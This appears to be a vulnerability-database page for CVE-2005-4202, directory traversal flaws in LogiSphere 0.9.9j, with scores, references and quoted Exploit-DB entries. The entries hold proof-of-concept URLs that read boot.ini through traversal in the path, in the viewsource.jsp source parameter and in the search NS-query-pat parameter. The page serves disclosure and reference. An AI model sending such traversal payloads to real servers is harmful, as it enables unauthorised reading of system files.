CVE-2005-4202
published 2005-12-13CVE-2005-4202: Multiple directory traversal vulnerabilities in LogiSphere 0.9.9j allow remote attackers to access arbitrary files via (1) .. (dot dot), (2) "..." (triple…
PriorityP428medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.42%
87.4th percentile
Multiple directory traversal vulnerabilities in LogiSphere 0.9.9j allow remote attackers to access arbitrary files via (1) .. (dot dot), (2) "..." (triple dot), and (3) "..//" sequences in the URL, (4) "../" sequences in the source parameter to viewsource.jsp, or (5) "..\" (dot dot backslash) sequences in the NS-query-pat parameter to the search URL. URL.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| logisphere | logisphere | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access
exploitdb·2005-12-12
CVE-2005-4202 LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access
LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access
---
source: https://www.securityfocus.com/bid/15807/info
LogiSphere is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the Web server process. Information obtained may aid in further attacks; other attacks are also possible.
http://www.example.com:8080/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
Exploit-DB
LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access
exploitdb·2005-12-12
CVE-2005-4202 LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access
LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access
---
source: https://www.securityfocus.com/bid/15807/info
LogiSphere is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the Web server process. Information obtained may aid in further attacks; other attacks are also possible.
http://www.example.com:8080/.../.../.../.../.../.../.../boot.ini
http://www.example.com:8080/../../../../../../../../../boot.ini
http://www.example.com:8080/../../../boot.ini
http://www.example.com:8080/..//..//..//..//..//..//..//boot.ini
http://www.example.com:8080/boot.ini
ht
Exploit-DB
LogiSphere 0.9.9 j - 'Search?NS-query-pat' Traversal Arbitrary File Access
exploitdb·2005-12-12
CVE-2005-4202 LogiSphere 0.9.9 j - 'Search?NS-query-pat' Traversal Arbitrary File Access
LogiSphere 0.9.9 j - 'Search?NS-query-pat' Traversal Arbitrary File Access
---
source: https://www.securityfocus.com/bid/15807/info
LogiSphere is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the Web server process. Information obtained may aid in further attacks; other attacks are also possible.
http://www.example.com:8080/search?NS-query-pat=..\..\..\..\..\..\..\..\boot.ini
No writeups or analysis indexed.
http://secunia.com/advisories/17989http://www.ipomonis.com/advisories/logisphere_server.ziphttp://www.securityfocus.com/bid/15807http://www.vupen.com/english/advisories/2005/2840https://exchange.xforce.ibmcloud.com/vulnerabilities/23552http://secunia.com/advisories/17989http://www.ipomonis.com/advisories/logisphere_server.ziphttp://www.securityfocus.com/bid/15807http://www.vupen.com/english/advisories/2005/2840https://exchange.xforce.ibmcloud.com/vulnerabilities/23552
2005-12-13
Published